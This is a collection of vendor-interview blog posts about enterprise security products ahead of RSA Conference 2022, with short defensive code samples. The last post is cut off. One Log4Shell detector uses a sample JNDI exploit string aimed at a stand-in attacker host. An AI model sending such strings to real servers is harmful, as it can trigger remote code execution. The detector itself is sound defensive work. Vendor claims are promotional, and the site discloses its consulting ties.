The zero trust approach to enterprise security is well on its way to mainstream adoption. This is a very good thing.

Related: Covid-19 ruses used in email attacks

At RSA Conference 2022, which takes place next week in San Francisco, advanced technologies to help companies implement zero trust principles will be in the spotlight. Lots of innovation has come down the pike with respect to imbuing zero trust into two pillars of security operations: connectivity and authentication.

However, there’s a third pillar of zero trust that hasn’t gotten quite as much attention: directly defending data itself, whether it be at the coding level or in business files circulating in a highly interconnected digital ecosystem. I had a chance to discuss the latter with Ravi Srinivasan, CEO of Tel Aviv-based Votiro, which launched in 2010.

Votiro has established itself as a leading supplier of advanced technology to cleanse weaponized files. It started with cleansing attachments and weblinks sent via email and has expanded to sanitizing files flowing into data lakes and circulating in file shares. For a full drill down on our discussion, please give the accompanying podcast a listen. Here are key takeaways.

Digital fuel

Votiro’s new cloud services address the pillar of zero trust that is now getting more attention: directly protecting digital content in and of itself. Zero trust, put simply, means eliminating implicit trust. Much has been done with connectivity and authentication. By contrast, comparatively little attention has been paid to applying zero trust directly to data and databases, Srinivasan observes. But that needs to change, he says. Here’s his argument:

Companies are competing to deliver innovative digital services faster and more flexibly than ever. Digital content creation is flourishing with intellectual property, financial records, marketing plans and legal documents circulating within a deeply interconnected digital ecosystem.

Digital content has become the liquid fuel of digital commerce—and much of it now flows into and out of massive data lakes supplied by Amazon Web Services, Microsoft Azure and Google Cloud. This transition happened rapidly, with scant attention paid to applying zero trust principles to digital content.

However, a surge of high-profile ransomware attacks and supply chain breaches has made company leaders very nervous. “I speak to a lot of security leaders around the world, and one of their biggest fears is the rapid rise of implementing data lakes and the fear that the data lake will turn into a data swamp,” Srinivasan says.

Votiro’s technology provides a means to sanitize weaponized files at all of the points where threat actors now try to insert them. It does this by permitting only known good files into a network, while extracting unknown and untrusted elements for analysis. Votiro refined this service cleansing weaponized attachments and web links sent via email, and has extended it to cleansing files as they flow into data lakes and circulate in file shares.
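
Votiro doesn’t publish its engine’s internals here, but the underlying “allow known good, rebuild the rest” idea behind content disarm and reconstruction (CDR) is easy to sketch. This toy Python example, illustrative only and assuming the Pillow imaging library, classifies files by magic bytes rather than claimed extension, and rebuilds an image pixel by pixel so anything smuggled inside the original gets left behind:

```python
# Illustrative only -- not Votiro's engine. Two pieces of the CDR idea:
#  1) classify a file by magic bytes, never by its claimed extension;
#  2) rebuild an image from raw pixels so embedded extras are dropped.
# Assumes the Pillow imaging library (pip install Pillow).
from PIL import Image

KNOWN_GOOD = {                      # tiny allow-list of file signatures
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"%PDF-": "pdf",
}

def identify(path: str):
    """Return the allow-listed type, or None for unknown/untrusted files."""
    with open(path, "rb") as f:
        header = f.read(8)
    for magic, kind in KNOWN_GOOD.items():
        if header.startswith(magic):
            return kind
    return None  # unknown: quarantine and extract for analysis

def rebuild_image(src: str, dst: str) -> None:
    """Re-create an image from raw pixels, dropping metadata and payloads."""
    with Image.open(src) as img:
        clean = Image.new("RGB", img.size)
        clean.putdata(list(img.convert("RGB").getdata()))
        clean.save(dst, format="PNG")
```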

Exploiting fresh gaps

As agile, cloud-centric business communications have taken center stage, cyber criminals quite naturally have turned their full attention to inserting weaponized files wherever it’s easiest for them to do so, Srinivasan observes. As always, the criminals follow the data, he says.

“The trend that we’re seeing is that more than 30 percent of the content flowing into data lakes is from untrusted sources,” he says. “It’s documents, PDFs, CSV files, Excel files, images, lots of unstructured data; we track 150 different file types . . . we’re seeing evasive objects embedded in those files designed to propagate downstream within the enterprise.”

This is the dark side of digital transformation. Traditionally, business applications tapped into databases kept on servers in a temperature-controlled clean room — at company headquarters. These legacy databases were siloed and well-protected; there was one door in and one door out.

Data – i.e., code and content – today fly around intricately connected virtual servers running in private clouds and public clouds. As part of this very complex, highly distributed architecture, unstructured data flows from myriad sources into and back out of partner networks, cloud file shares and data lakes. This in-flow and out-flow happens via custom-coded APIs configured by who knows whom.

Votiro’s cleansing scans work via an API that attaches to each channel of content flowing into a data lake. This cleansing process is shedding light on the fresh security gaps cyber criminals have discovered – and have begun exploiting, Srinivasan says.

Evolving attacks

He told me about a recent, highly advanced example: an attacker managed to insert attack code into a zip file contained in a password-protected email message – one that the banker was expecting to receive from the attorney.

At a fundamental level, this attacker was able to exploit gaps in the convoluted matrix of interconnected resources the bank and law firm now rely on to conduct a routine online transaction. “Bad actors are constantly evolving their techniques to compromise the organization’s business services,” Srinivasan says.

Closing these fresh gaps requires applying zero trust principles to the connectivity layer, the authentication layer — and the content layer, he says. “What we’re doing is to deliver security as a service that works with the existing security investments companies have made,”  Srinivasan  says. “We integrate with existing edge security and data protection capabilities as that final step of delivering safe content to users and applications at all times.”

It’s encouraging that zero trust is gaining material traction at multiple layers. There’s a lot more ground to cover. I’ll keep watch and keep reporting.

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

It’s not difficult to visualize how companies interconnecting to cloud resources at a breakneck pace contribute to the outward expansion of their networks’ attack surface.

Related: Why ‘SBOM’ is gaining traction

If that wasn’t bad enough, the attack surface companies must defend is expanding inwardly, as well – as software tampering at a deep level escalates.

The SolarWinds breach and the disclosure of the massive Log4J vulnerability have put company decision makers on high alert with respect to this freshly minted exposure. Findings released this week by ReversingLabs show 87 percent of security and technology professionals view software tampering as a new breach vector of concern, yet only 37 percent say they have a way to detect it across their software supply chain.

I had a chance to discuss software tampering with Tomislav Pericin, co-founder and chief software architect of ReversingLabs, a Cambridge, MA-based vendor that helps companies granularly analyze their software code. For a full drill down on our discussion please give the accompanying podcast a listen. Here are the big takeaways:

‘Dependency confusion’

Much of the discussion at RSA Conference 2022, which convenes next week in San Francisco, will boil down to slowing attack surface expansion. This now includes paying much closer attention to the elite threat actors who are moving inwardly to carve out fresh vectors taking them deep inside software coding.

The perpetrators of the SolarWinds breach, for instance, tampered with a build system of the widely used Orion network management tool. They then were able to trick some 18,000 companies into deploying an authentically signed Orion update carrying a heavily obfuscated backdoor.

Log4J, aka Log4Shell, refers to a gaping vulnerability that exists in an open-source logging library that’s deeply embedded within servers and applications all across the public Internet. Its function is to record events in a log for a system administrator to review and act upon. Left unpatched, Log4Shell presents a ripe opportunity for a bad actor to carry out remote code execution attacks, Pericin told me.
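
The telltale pattern is simple enough to sketch: on a vulnerable Log4j 2.x, any logged string containing a `${jndi:...}` lookup, even a User-Agent header, could trigger a remote class load. Here is a deliberately naive Python scanner for that pattern; real exploit strings used nested obfuscation that a simple regex like this will miss:

```python
# Toy detector for the telltale Log4Shell pattern. Naive on purpose:
# real attack strings used nested obfuscation a plain regex won't catch.
import re

JNDI_LOOKUP = re.compile(r"\$\{jndi:(?:ldaps?|rmi|dns)://", re.IGNORECASE)

def flag_suspicious(lines):
    """Yield (line_number, line) pairs that contain a JNDI lookup."""
    for lineno, line in enumerate(lines, start=1):
        if JNDI_LOOKUP.search(line):
            yield lineno, line.rstrip()

sample = ['GET /?q=${jndi:ldap://attacker.example/a} HTTP/1.1']
for n, hit in flag_suspicious(sample):
    print(f"line {n}: possible JNDI lookup -> {hit}")
```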

This type of attack takes advantage of the highly dynamic, ephemeral way software interconnects to make modern digital services possible.

“As we go about defining layers on top of layers of application code, understanding all the interdependencies becomes very complex,” Pericin told me. “You really need to go deep into all of these layers to be able to understand if there’s any hidden behaviors or unaccounted for code that introduce risk in any of the layers.”

Obfuscated tampering

Dependency confusion can arise anytime a developer reaches out to a package repository. Modern software is built on pillars of open-source components, and package repositories offer easy access to the wealth of pre-built code that makes development faster. However, not all of that code is safe to use. Capitalizing on dependency confusion, threat actors seek ways to insert malicious elements; and they take intricate steps to obfuscate their code tampering. Most often their objective is to install a back door through which they can come and go – and take full control of the underlying system anytime they please, Pericin says.
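
To see why this works, consider that a resolver consulting both a private and a public index will happily take the higher version number from either. As a rough illustration, here is a pre-flight check sketched in Python against PyPI’s public JSON endpoint; the internal package names are hypothetical:

```python
# Rough pre-flight check for dependency confusion: if an internal-only
# package name also exists on the public index, an attacker could publish
# a higher version there and win the resolver race.
import urllib.error
import urllib.request

INTERNAL_PACKAGES = ["acme-billing-core", "acme-auth-utils"]  # hypothetical

def exists_on_pypi(name: str) -> bool:
    """True if a package with this name is registered on pypi.org."""
    try:
        with urllib.request.urlopen(f"https://pypi.org/pypi/{name}/json",
                                    timeout=10) as resp:
            return resp.status == 200
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return False
        raise

for pkg in INTERNAL_PACKAGES:
    if exists_on_pypi(pkg):
        print(f"WARNING: '{pkg}' exists on PyPI -- dependency confusion risk")
```

The usual mitigations are to resolve from a single trusted index and to pin dependencies by hash, so a look-alike public package can never outrank the internal one.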

Last year, white hat researcher Alex Birsan shed a bright light on just how big an opportunity this presents to malicious hackers. Birsan demonstrated how dependency confusion attacks could be leveraged to tamper with coding deep inside of system software at Apple, PayPal, Tesla, Netflix, Uber, Shopify and Yelp.

Then in late April, ReversingLabs and other vendors shared stunning evidence of such attacks moving beyond the theoretical and into live service. A red team of security researchers dissected a dependency confusion campaign aimed at taking control of the networks of leading media, logistics and industrial firms in Germany.

The basic definition of software tampering, Pericin notes, is to insert unverified code into the authorized code base. In the current operating environment, there’s limitless opportunity to tamper with code, because such a high premium is put on agility.

“There are many places in the software supply chain where you can add unverified code, and the attackers are actually doing that,” Pericin says. “And that’s also why it can be so hard to detect.”

Implementing SBOM

Even as their organizations push more operations out to the Internet edge, senior executives are starting to realize that their internal attack surface is riddled with security holes, as well. Some 98 percent of the respondents to the ReversingLabs poll acknowledged that software supply chain risks are rising – due to their intensive use of third-party code and open source code. However, only 51 percent believed they could prevent their software from being tampered with.

For its part, ReversingLabs supplies an advanced code scanning and analysis service, called Software Assurance, that can help companies verify that their applications haven’t been tampered with. Software developers at large shops are getting into the habit of using this tool to deeply scan software packages as a final quality check, just before deployment, Pericin told me.

Some companies are going so far as using this tool to selectively scan mission-critical software arriving from smaller houses and independent developers for behavioral oddities, as well, he says.

Having the ability to granularly scan code also plays well with the drive to mainstream SBOM, which stands for Software Bill of Materials.

SBOM is an industry effort to standardize the documentation of a complete list of authorized components in a software application.
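
For a concrete sense of what that documentation looks like, here is a minimal, CycloneDX-style example generated in Python. The field names follow the public CycloneDX specification; the components listed are invented:

```python
# A minimal, CycloneDX-style illustration of what an SBOM records. Field
# names follow the public CycloneDX spec; the components are invented.
import json

sbom = {
    "bomFormat": "CycloneDX",
    "specVersion": "1.4",
    "components": [
        {"type": "library", "name": "log4j-core", "version": "2.17.1",
         "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.17.1"},
        {"type": "library", "name": "requests", "version": "2.27.1",
         "purl": "pkg:pypi/requests@2.27.1"},
    ],
}
print(json.dumps(sbom, indent=2))
```

With an inventory like this in hand, answering “are we exposed to Log4J?” becomes a lookup rather than a scramble.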

President Biden’s cybersecurity executive order, issued in May 2021, includes a detailed SBOM requirement for all software delivered to the federal government.

And now advanced scanning tools, like those supplied by ReversingLabs, are ready for prime time – to help companies detect and deter software tampering, as well as implement SBOM as a standard practice.

“One of the outcomes of doing this analysis is you gain the ability to correctly identify what’s present in the software package, which is the software bill of materials,” Pericin observes.

In today’s environment, organizations need to figure out how to secure their external edge, that’s for certain. But it’s equally important to account for their internal edge, to stop software tampering in its tracks. It’s encouraging that the technology to do that is available. I’ll keep watch and keep reporting.

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

 

 

Third-Party Risk Management (TPRM) has been around since the mid-1990s – and has become something of an auditing nightmare.

Related: A call to share risk assessments

Big banks and insurance companies instilled the practice of requesting their third-party vendors to fill out increasingly bloated questionnaires, called bespoke assessments, which they then used as their sole basis for assessing third-party risk.

TPRM will be in the spotlight at the RSA Conference 2022 next week in San Francisco. This is because third-party risk has become a huge problem for enterprises in the digital age. More so than ever, enterprises need to move beyond check-the-box risk assessments; there’s a clear and present need to proactively mitigate third-party risks.

The good news is that TPRM solution providers are innovating to meet this need, as will be showcased at RSA. One leading provider is Denver, Colo.-based CyberGRX. I had the chance to sit down with their CISO, Dave Stapleton, to learn more about the latest advancements in TPRM security solutions. For a full drill down of our discussion, please give the accompanying podcast a listen. Here are key takeaways:

Smoothing audits

CyberGRX launched in 2016 precisely because bespoke assessments had become untenable. Questionnaires weren’t standardized, filling them out and collecting them had become a huge burden, and any truly useful analytics just never happened.

“Sometimes you’d get a 500-question questionnaire and that would be one out of 5,000 you’d get over the course of a year,” Stapleton says, referring to a scenario that a large payroll processing company had to deal with.

CyberGRX created an online exchange to serve as a clearinghouse where assessments could be more efficiently – and usefully – administered. Digital transformation had taken hold, so their timing was pitch perfect.

“Usage of third-party vendors has escalated exponentially in the past 10 years, and businesses also rely on them for more sensitive and critical activities,” Stapleton noted.

Moving the questionnaires to an exchange model meant introducing a standardized crowdsourcing approach to compiling and making available what was previously bespoke assessment data. This also made remediation – i.e. getting third-party vendors to mitigate potential risks and maintain compliance with audit benchmarks – much smoother.

This alone was a huge improvement. “The exchange model has been quite revolutionary,” Stapleton says. “We were able to reduce the level of effort for both third parties and their customers. Third parties get fewer requests so they can focus more time and energy on security; customers have one place they can go to get the data they need.”

Cyber risk profiling

CyberGRX’s global cyber risk Exchange caught on quickly. But the company founders never intended to stop at simply cleaning up bespoke assessments. The exchange has proven to be a perfect mechanism for fleshing out much richer cyber risk profiles of third-party vendors. It does this by ingesting and correlating data from a wide array of security-related datasets.

This folds in fresh intelligence that goes far beyond the ground covered in traditional bespoke assessments, which are merely the starting point. Questionnaire answers get cross referenced against cybersecurity best practice protocols put out by the National Institute of Standards and Technology, namely NIST 800-53 and NIST 800-171.
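
CyberGRX hasn’t published its scoring engine, but purely for illustration, the cross-referencing step might reduce to something like this Python sketch, where each questionnaire answer is tied to a control. The control IDs are real NIST 800-53 identifiers; the questions and the mapping are invented:

```python
# Invented for illustration -- not CyberGRX's methodology. Each questionnaire
# answer maps to a NIST 800-53 control; unmet controls surface as findings.
ANSWER_TO_CONTROL = {
    "enforces_mfa": "IA-2(1)",         # identification and authentication
    "encrypts_data_at_rest": "SC-28",  # protection of information at rest
    "maintains_ir_plan": "IR-8",       # incident response plan
}

def findings(answers: dict) -> list:
    """Return the NIST controls a vendor's answers leave unmet."""
    return [ctrl for question, ctrl in ANSWER_TO_CONTROL.items()
            if not answers.get(question, False)]

vendor_answers = {"enforces_mfa": True, "encrypts_data_at_rest": False}
print(findings(vendor_answers))  # -> ['SC-28', 'IR-8']
```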

CyberGRX is also able to leverage real-time threat intelligence feeds by partnering with leading threat intelligence vendors. These vendors integrate their abilities to monitor malware circulation and cyber-attack activity in real time within the Exchange platform, including staying alert for any signs of third-party vendor cyber assets turning up in murky parts of the Dark Web.

Another function of the Exchange is to analyze a third-party vendor’s “firmographics” – publicly known details such as geographic location, industry type, target markets, business performance and organizational structure. So contextual industry background and fresh threat landscape intel gets continually infused into traditional audit findings. Stapleton characterizes this as “cyber risk intelligence” profiling.

“The idea behind it is that this is a process of collecting the right data, creating your own quality data and performing very complex analysis in order to produce actionable results,” he says.

Cyber hygiene boost

This enrichment of the check-the-box approach to third-party risk assessments is paying off on a number of levels, he says. Material productivity gains derive from risk managers on both sides spending much less time mucking with bespoke audits. “Our methodology provides security and risk professionals with next-level insights that empower them to quickly make decisions in regards to risk management, spending less time on mitigating risks and more time focusing on other important initiatives,” Stapleton says.

More nuanced benefits accrue, as well. For instance, as more substantive vetting of third-party vendors gains traction, the overall level of supply chain cyber hygiene gets boosted. Third parties quickly discover that checking boxes isn’t going to be enough; first-party enterprises gain clarity, in a very practical sense, on security practices they need to prioritize.

Observes Stapleton:  “It’s a combination of capabilities that produces something that is truly actionable, specifically for the purposes of improving third party risk management outcomes.”

The ceiling for strengthening security postures – of third parties and first parties alike — is high. For instance, Stapleton described for me how CyberGRX can now correlate firmographics to threat intel feeds and audit data to provide innovative new services that were unheard of just a couple of years ago.

For one, the exchange can now reliably predict how a vendor will respond to a risk assessment without having them input any information. Thus, an enterprise can weigh whether to accept a given supplier — without necessarily administering a full-blown assessment audit.

For another, the exchange is continually improving its capacity to granularly gauge a third-party vendor’s exposure to a high-profile vulnerability or even a certain type of exploit known to be circulating in the wild.

“We can map to something like the MITRE ATT&CK framework and perform an analysis that tells you which of your third parties are most likely to be vulnerable to something like Log4J.”

What’s more, advanced third-party risk mitigation can also help offset the cybersecurity skills shortage. “We’re putting our security professionals back to work instead of filling out spreadsheets,” Stapleton asserts, “and we’re giving enterprises information they can use to start working with their third parties today to improve security of the supply chain.”

This is one part of igniting a virtuous cycle. New cloud-centric security frameworks, like Zero Trust Network Access (ZTNA) and Secure Access Service Edge (SASE), and new security tools – to advance detection and response, as well as properly configure all cyber assets – must take hold as well. I’ll keep watch and keep reporting.

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

 

Companies have come to depend on Software as a Service – SaaS — like never before.

Related: Managed security services catch on

From Office 365 to Zoom to Salesforce.com, cloud-hosted software applications have come to make up the nerve center of daily business activity. Companies now reach for SaaS apps for clerical chores, conferencing, customer relationship management, human resources, salesforce automation, supply chain management, web content creation and much more, even security.

This development has intensified the pressure on companies to fully engage in the “shared responsibility” model of cybersecurity, a topic that will be in the limelight at RSA Conference 2022 next week in San Francisco.

I visited with Maor Bin, co-founder and CEO of Tel Aviv-based Adaptive Shield, a pioneer in a new security discipline referred to as SaaS Security Posture Management (SSPM). SSPM is part of an emerging class of security tools being ramped up to help companies dial in SaaS security settings as they should have started doing long ago.

This fix is just getting under way. For a full drill down, please give the accompanying podcast a listen. Here are the key takeaways:

Shrugging off security

A sharp line got drawn in the sand, some years ago, when Amazon Web Services (AWS) took the lead in championing the shared responsibility security model.

To accelerate cloud migration, AWS, Microsoft Azure and Google Cloud guaranteed that the hosted IT infrastructure they sought to rent to enterprises would be security-hardened – at least on their end. For subscribers, the tech giants issued a sprawling set of security settings for their customers’ security teams to monkey with. It was left up to each company to dial-in just the right amount of security-vs-convenience.

SaaS vendors, of course, readily adopted the shared responsibility model pushed out by the IT infrastructure giants. Why wouldn’t they? Thus, the burden was laid squarely on company security teams to harden cloud-connections on their end.

What happened next was predictable. Caught up in chasing the productivity benefits of cloud computing, many companies looked past  doing any security due diligence, Bin says.

Security teams ultimately were caught flat-footed, he says. Security analysts had gotten accustomed to locking down servers and applications that were on premises and within their arms’ reach. But they couldn’t piece together the puzzle of how to systematically configure myriad overlapping security settings scattered across dozens of SaaS applications.

The National Institute of Standards and Technology recognized this huge security gap for what it was, and issued NIST 800-53 and NIST 800-171 – detailed criteria for securely configuring cloud connections. But many companies simply shrugged off the NIST protocols.

“It turned out to be very hard for security teams to get control of SaaS applications,” Bin observes.  “First of all, there was a lack of any knowledge base inside companies and often times the owner of the given SaaS app wasn’t very cooperative.”

SaaS due diligence

Threat actors, of course, didn’t miss their opportunity. Wave after wave of successful exploits took full advantage of the misconfigurations spinning out of cloud migration. Fraudulent cash transfers, massive ransomware payouts, infrastructure and supply chain disruptions all climbed to new heights. And malicious hackers attained deep, unauthorized access left and right. Every CISO should, by now, cringe at the thought of his or her organization becoming the next Capital One or SolarWinds or Colonial Pipeline.

At RSA Conference 2022, which opens next week in San Francisco, the buzz will be around the good guys finally getting their act together and pushing back. For instance, an entire cottage industry of cybersecurity vendors has ramped up specifically to help companies improve their cloud “security posture management.”

This includes advanced cloud access security broker (CASB) and cyber asset attack surface management (CAASM) tools.  SSPM solutions, like Adaptive Shield’s, are among the newest and most innovative tools. Other categories getting showcased at RSAC 2022 include cloud security posture management (CSPM) and application security posture management (ASPM) technologies.

For its part, Adaptive Shield supplies a solution designed to provide full visibility and control of every granular security configuration in some 70 SaaS applications now used widely by enterprises. This can range from dozens to hundreds of security toggles, per application, controlling things like privileged access, multi-factor authentication, phishing protection, digital key management, auditing and much more.

Tools at hand

Security teams now have the means to methodically filter through and make strategic adjustments of each and every SaaS security parameter. Misconfigurations – i.e. settings that don’t meet NIST best practices — can be addressed immediately, or a service ticket can be created and sent on its way.
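
Adaptive Shield’s internals aren’t public, but conceptually the check-and-ticket loop reduces to something like the Python sketch below, in which the baseline, the live settings and the app name are all stand-ins for real vendor APIs:

```python
# A toy sketch of the SSPM check-and-ticket loop. Baseline, settings and
# app names are stand-ins, not any vendor's actual schema.
BASELINE = {
    "mfa_required": True,
    "external_sharing": "restricted",
    "session_timeout_minutes": 30,
}

def posture_drift(app: str, live_settings: dict) -> list:
    """Diff one SaaS app's live settings against the security baseline."""
    return [
        f"{app}: {key} is {live_settings.get(key)!r}, expected {expected!r}"
        for key, expected in BASELINE.items()
        if live_settings.get(key) != expected
    ]

live = {"mfa_required": False, "external_sharing": "restricted"}
for issue in posture_drift("crm-app", live):
    print("MISCONFIGURATION:", issue)  # fix now, or open a service ticket
```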

“I like to call this SaaS security hygiene,” Bin says. “It’s a way to align your users, your devices and your third-party applications with different activities and different privileges. Misconfigurations is huge part of it, but it’s just one of the moving parts of securing your SaaS.”

Doing this level of SaaS security due diligence on a consistent basis is clearly something well worth doing and something that needs to become standard practice. It will steadily improve an organization’s cloud security policies over time; and it should also promote security awareness and reinforce security best practices far beyond the security team, namely to the users of the apps.

Company by company this will slow the expansion of the attack surface, perhaps even start to help shrink the attack surface over time. Things are moving in a good direction. I’ll keep watch and keep reporting.

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

Vulnerability management, or VM, has long been an essential, if decidedly mundane, component of network security.

Related: Log4J’s long-run risks

That’s changing — dramatically. Advanced VM tools and practices are rapidly emerging to help companies mitigate a sprawling array of security flaws spinning out of digital transformation.

I visited with Scott Kuffer, co-founder and chief operating officer of Sarasota, FL-based Nucleus Security, which is in the thick of this development. Nucleus launched in 2018 and has grown to over 50 employees. It supplies a unified vulnerability and risk management solution that automates vulnerability management processes and workflows.

We discussed why VM has become acutely problematic yet remains something that’s vital for companies to figure out how to do well, now more so than ever. For a full drill down, please give the accompanying podcast a listen. Here are the key takeaways:

Multiplying exposures

Scan and patch. Historically, this has been what VM was all about. Microsoft’s Patch Tuesday speaks to the never-ending flow of freshly discovered software flaws — and the software giant’s best efforts to ease the burden of mitigating them.

Scan-and-patch systems from Tenable, Qualys, Rapid7, Checkmarx and others came along and became indispensable; enterprises could use these tools to keep software bugs and security holes patched at a tolerable level — not just flaws in Microsoft code, of course, but in software from all of their suppliers, internal and external.

However, that scan-and-patch equilibrium is no more. Digital transformation has spawned a cascade of nuanced, abstract vulnerabilities – and they’re everywhere. This results from companies chasing after agile software development and cloud-centric innovations, above all else. In aggressively leveraging digital services to achieve productivity gains they’ve also exponentially multiplied security gaps across a steadily expanding network attack surface.

“There are configuration weaknesses in cloud resources, vulnerabilities that need patching,  like Log4J, and vulnerabilities in the business logic of old code,” Kuffer observes. “There are many different types of these vulnerabilities, and it’s a matter of figuring out who owns them and how to fix them quickly, and, also, which ones to fix.”

Current threat landscape

So, what exactly constitutes a vulnerability these days? As Kuffer alluded to not long into our discussion, it goes far beyond the bug fixes and security patches that Microsoft, Oracle, Adobe and every supplier of business software distributes periodically.

A vulnerability, simply put, is a coding weakness by which software can be manipulated in a way that was never intended. Today, these exposures lurk not just in the legacy enterprise apps – the ones that need continual patching – they’re turning up even more so in the cloud-hosted storage buckets, virtual servers and Software-as-a-Service (SaaS) subscriptions that have become the heart of IT operations.

It all starts with DevOps, under which agile software is pushed out based on the principle of continuous integration and continuous delivery (CI/CD). Much heralded, CI/CD is a set of principles said to result in the delivery of new software frequently and reliably.

Truthfully, CI/CD really is nothing more than an updated version of rushing shrink-wrapped boxes of new apps to store shelves. Remember when early adopters were giddy to receive the bug-riddled version 1.0 of a cool new app, anticipating that major bugs would get fixed in 1.1, 1.2 and so on?

Under CI/CD, developers collaborate remotely to press new code into live service as fast as possible and count on making iterative fixes on the fly.

This fail-fast imperative often leverages cloud storage and virtual servers; code development revolves around interconnecting modular microservices and software containers scattered all across public and private clouds.

To malicious hackers this translates into a candy store of fresh vulnerabilities. In many ways it’s easier than ever for threat actors to get deep access, steal data, spread ransomware, disrupt infrastructure and attain long-run unauthorized access.

Unified solution

All of that said, it’s not so much the agile software trend, in and of itself, that’s to blame. Security gaps generally — and vulnerabilities specifically — have surpassed the tolerable level in large part because companies have not paid nearly enough attention to configuring their public cloud and hybrid cloud IT systems. In short, software interconnections are skewed toward agility.

Fine tuning is in order and there’s really no mystery how to go about dialing in the necessary measure of security. Robust data security frameworks have been painstakingly assembled and vetted by the National Institute of Standards and Technology (NIST). However, adhering to NIST 800-53 and NIST 800-171 is voluntary and, for whatever reasons, far too many enterprises have yet to fully embrace robust data security best practices.

To illustrate, Kuffer pointed me to the all-too-common scenario where a company goes live with an AWS root account that uses a default password to access all of its EC2 virtual servers and S3 storage buckets. “That misconfiguration is a vulnerability because anybody who finds that password and then logs in to your AWS account has full admin control over your entire cloud infrastructure,” he says.
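
That class of misconfiguration is detectable programmatically. Here’s a brief sketch using boto3, AWS’s Python SDK, that flags a root account without MFA, lingering root access keys and buckets missing a public-access block; it assumes read-only IAM and S3 credentials and is a starting point, not a complete audit:

```python
# Starting-point account hygiene checks with boto3 (AWS's Python SDK).
# Assumes read-only IAM/S3 credentials are configured in the environment.
import boto3
from botocore.exceptions import ClientError

iam = boto3.client("iam")
s3 = boto3.client("s3")

summary = iam.get_account_summary()["SummaryMap"]
if not summary.get("AccountMFAEnabled"):
    print("RISK: root account has no MFA enabled")
if summary.get("AccountAccessKeysPresent"):
    print("RISK: root access keys exist -- delete them")

for bucket in s3.list_buckets()["Buckets"]:
    try:
        s3.get_public_access_block(Bucket=bucket["Name"])
    except ClientError as err:
        if err.response["Error"]["Code"] == "NoSuchPublicAccessBlockConfiguration":
            print(f"RISK: bucket {bucket['Name']} has no public-access block")
        else:
            raise
```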

This kind of thing can be rectified by adopting risk-assessment principles alongside CI/CD. And the good news, Kuffer says, is that the cybersecurity industry is driving towards helping companies get better at systematically identifying, analyzing and controlling vulnerabilities.

Risk-tolerance security

VM done from a risk-assessment lens boils down to enterprises making a concerted effort to discover and thoughtfully inventory all of the coding flaws and misconfigurations inhabiting their increasingly cloud-centric networks, and then doing triage based on risk-tolerance principles.
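
Nucleus Security hasn’t shared its scoring model here; purely as an illustration, risk-tolerance triage can be reduced to weighting each finding’s severity by asset criticality and known exploitation, then drawing a cutoff:

```python
# Purely illustrative scoring -- not Nucleus Security's model. Severity is
# weighted by asset criticality and known exploitation, then triaged
# against the organization's risk-tolerance cutoff.
from dataclasses import dataclass

@dataclass
class Finding:
    cve: str
    cvss: float             # base severity, 0-10
    asset_criticality: int  # 1 = lab box ... 5 = crown jewels
    exploited_in_wild: bool

    @property
    def risk(self) -> float:
        multiplier = 2.0 if self.exploited_in_wild else 1.0
        return self.cvss * self.asset_criticality * multiplier

RISK_TOLERANCE = 30.0  # set by policy, not by the tool

queue = sorted(
    [Finding("CVE-2021-44228", 10.0, 5, True),  # Log4Shell on a core server
     Finding("CVE-2099-0001", 4.3, 1, False)],  # placeholder low-risk flaw
    key=lambda f: f.risk, reverse=True,
)
print([f.cve for f in queue if f.risk >= RISK_TOLERANCE])  # fix these first
```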

This absolutely can be done, ironically, because cybersecurity vendors themselves are innovating off the strengths of cloud resources and agile software. At RSA Conference 2022 opening next week in San Francisco, there will be considerable buzz around new tools and frameworks that empower companies to discover and inventory software bugs and misconfigurations, cost-effectively and at scale.

This includes a host of leading-edge technologies supporting emerging frameworks such as cyber asset attack surface management (CAASM), cloud security posture management (CSPM), application security posture management (ASPM) and even software-as-a-service security posture management (SSPM).

Specialized analytics platforms — like those from Nucleus Security and other suppliers of advanced VM technologies – fit in by enabling companies to ingest security posture snapshots from all quarters, Kuffer says. Advanced VM systems are designed to efficiently implement and enforce wise policy, without unduly disrupting agility, he says.

Clearly, the frameworks and technology are ready for prime time. If the continuing ransomware scourge and widening supply chain hacks tell us anything, it’s that it’s high time for companies to dial back on agility and dial in more security. I’ll keep watch and keep reporting.

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

It’s no secret that cybersecurity roles are in high demand. Today there are more than 500,000 open cybersecurity roles in the U.S., leaving organizations vulnerable to cyber threats.

Related: Deploying employees as threat sensors

Meanwhile, 200,000 well-trained and technically skilled military service members are discharged each year.

These individuals have many transferable skills that would make cybersecurity a prosperous civilian career. Yet, there’s still work to be done to make this path more accessible and known among the veteran and transitioning military community.

Fundamentally, cybersecurity professionals identify weaknesses and design systems and processes to protect any organization — government agencies, private companies — from cyberattacks. Veterans have the characteristics that make them ideal for these roles. They’re exceptional at working in high-pressure environments, managing confidential information, solving complex problems and responding systematically.

Better still, cybersecurity jobs offer the individuals who have served our country a fulfilling career. Cybersecurity jobs are always available and offer many options for people who want to work remotely or move around the country for family or career reasons. Plus — they tend to pay well too. The average salary is $116,000 annually plus benefits.

While veterans are well-suited to transition into cybersecurity, there is often a disconnect when raising awareness about these opportunities and outlining paths to entry. Training and certification must become more accessible and hiring criteria must change to encourage veterans to apply for these roles.

For the cybersecurity industry in need of filling mission-critical roles, our responsibility is to make a concerted effort to help place these skilled individuals into jobs.

Programs from private companies that focus on hiring veterans, offering free technical training and certification courses and upskilling existing veteran employees into cybersecurity roles could be an answer to our industry’s talent shortage. Including a veteran during the cybersecurity talent recruitment process is one way to create a more inclusive hiring process, as they understand the language, process and skills fellow veterans may have.

